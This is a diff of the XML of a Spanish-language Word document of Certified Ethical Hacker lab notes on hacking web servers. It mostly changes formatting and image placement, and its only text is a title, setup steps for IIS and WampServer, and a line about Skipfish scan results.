--- a/CEHv9/Hacking WebServers.docx
+++ b/CEHv9/Hacking WebServers.docx
@@ -402,16 +402,7 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tema: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Certification Ethical Hacker, Module 11 Hacking Webserver</w:t>
+        <w:t>Tema: Certification Ethical Hacker, Module 11 Hacking Webserver</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -555,7 +546,10 @@
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:rPr/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
       </w:r>
     </w:p>
     <w:p>
@@ -1038,11 +1032,7 @@
       <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1065,6 +1055,20 @@
         </w:rPr>
       </w:pPr>
       <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
@@ -1122,106 +1126,19 @@
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
         </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Tareas de Laboratorio</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>Antes de comenzar esta práctica de laboratorio, inicie sesión en Windows Server 2008 y detenga el servicio de administración de IIS y el servicio de publicación World Wide Web. Para detener estos servicios, vaya a Inicio -&gt; Herramientas administrativas -&gt; Servicios, haga clic con el botón derecho en Servicio de administración de IIS y haga clic en Detener, haga clic con el botón derecho en Servicio de publicación World Wide Web y haga clic en Detener.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>Al detener el servicio de administración de ISS, si aparece un cuadro de diálogo Detener otros servicios que indica que otros servicios también se detendrán, haga clic en Sí.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>1.</w:t>
-        <w:tab/>
-        <w:t>Haga clic en Inicio y luego haga clic en iniciar WampServer para iniciar la aplicación WampServer.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
         <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="2">
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="43">
             <wp:simplePos x="0" y="0"/>
             <wp:positionH relativeFrom="column">
-              <wp:align>center</wp:align>
+              <wp:posOffset>29210</wp:posOffset>
             </wp:positionH>
             <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>635</wp:posOffset>
+              <wp:posOffset>31750</wp:posOffset>
             </wp:positionV>
-            <wp:extent cx="2190750" cy="2924175"/>
+            <wp:extent cx="6125210" cy="1477010"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="2" name="Image1" descr=""/>
+            <wp:docPr id="2" name="Image41" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1229,13 +1146,14 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="2" name="Image1" descr=""/>
+                    <pic:cNvPr id="2" name="Image41" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
                     <a:blip r:embed="rId3"/>
+                    <a:srcRect l="12099" t="26387" r="27203" b="47559"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1243,7 +1161,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="2190750" cy="2924175"/>
+                      <a:ext cx="6125210" cy="1477010"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1261,316 +1179,291 @@
         <w:pStyle w:val="Normal"/>
         <w:jc w:val="both"/>
         <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
+          <w:b/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Tareas de Laboratorio</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>Antes de comenzar esta práctica de laboratorio, inicie sesión en Windows Server 2008 y detenga el servicio de administración de IIS y el servicio de publicación World Wide Web. Para detener estos servicios, vaya a Inicio -&gt; Herramientas administrativas -&gt; Servicios, haga clic con el botón derecho en Servicio de administración de IIS y haga clic en Detener, haga clic con el botón derecho en Servicio de publicación World Wide Web y haga clic en Detener.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>Al detener el servicio de administración de ISS, si aparece un cuadro de diálogo Detener otros servicios que indica que otros servicios también se detendrán, haga clic en Sí.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:t>1.</w:t>
+        <w:tab/>
+        <w:t>Haga clic en Inicio y luego haga clic en iniciar WampServer para iniciar la aplicación WampServer.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="2">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>2324100</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>8255</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="1471930" cy="1964690"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="3" name="Image1" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="3" name="Image1" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId4"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="1471930" cy="1964690"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:jc w:val="both"/>
+        <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -1657,7 +1550,7 @@
             <wp:extent cx="6120130" cy="1087755"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="3" name="Image2" descr=""/>
+            <wp:docPr id="4" name="Image2" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1665,13 +1558,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="3" name="Image2" descr=""/>
+                    <pic:cNvPr id="4" name="Image2" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId4"/>
+                    <a:blip r:embed="rId5"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1743,7 +1636,7 @@
             <wp:extent cx="6120130" cy="3803015"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="4" name="Image3" descr=""/>
+            <wp:docPr id="5" name="Image3" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1751,13 +1644,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="4" name="Image3" descr=""/>
+                    <pic:cNvPr id="5" name="Image3" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId5"/>
+                    <a:blip r:embed="rId6"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1836,7 +1729,7 @@
             <wp:extent cx="6120130" cy="4055110"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="5" name="Image4" descr=""/>
+            <wp:docPr id="6" name="Image4" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1844,13 +1737,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="5" name="Image4" descr=""/>
+                    <pic:cNvPr id="6" name="Image4" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId6"/>
+                    <a:blip r:embed="rId7"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1914,7 +1807,7 @@
             <wp:extent cx="6120130" cy="4035425"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="6" name="Image5" descr=""/>
+            <wp:docPr id="7" name="Image5" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -1922,13 +1815,13 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="6" name="Image5" descr=""/>
+                    <pic:cNvPr id="7" name="Image5" descr=""/>
                     <pic:cNvPicPr>
                       <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId7"/>
+                    <a:blip r:embed="rId8"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1993,7 +1886,7 @@
             <wp:extent cx="6120130" cy="2897505"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:wrapSquare wrapText="largest"/>
-            <wp:docPr id="7" name="Image6" descr=""/>
+            <wp:docPr id="8" name="Image6" descr=""/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -2001,85 +1894,7 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="7" name="Image6" descr=""/>
-                    <pic:cNvPicPr>
-                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
-                    </pic:cNvPicPr>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId8"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr bwMode="auto">
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="6120130" cy="2897505"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:anchor>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:t>-</w:t>
-        <w:tab/>
-        <w:t>El resultado del rastreo de Skipfish aparece en el navegador web y muestra los resúmenes de los tipos de documentos y problemas encontrados, como se muestra en la siguiente captura de pantalla:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="8">
-            <wp:simplePos x="0" y="0"/>
-            <wp:positionH relativeFrom="column">
-              <wp:align>center</wp:align>
-            </wp:positionH>
-            <wp:positionV relativeFrom="paragraph">
-              <wp:posOffset>635</wp:posOffset>
-            </wp:positionV>
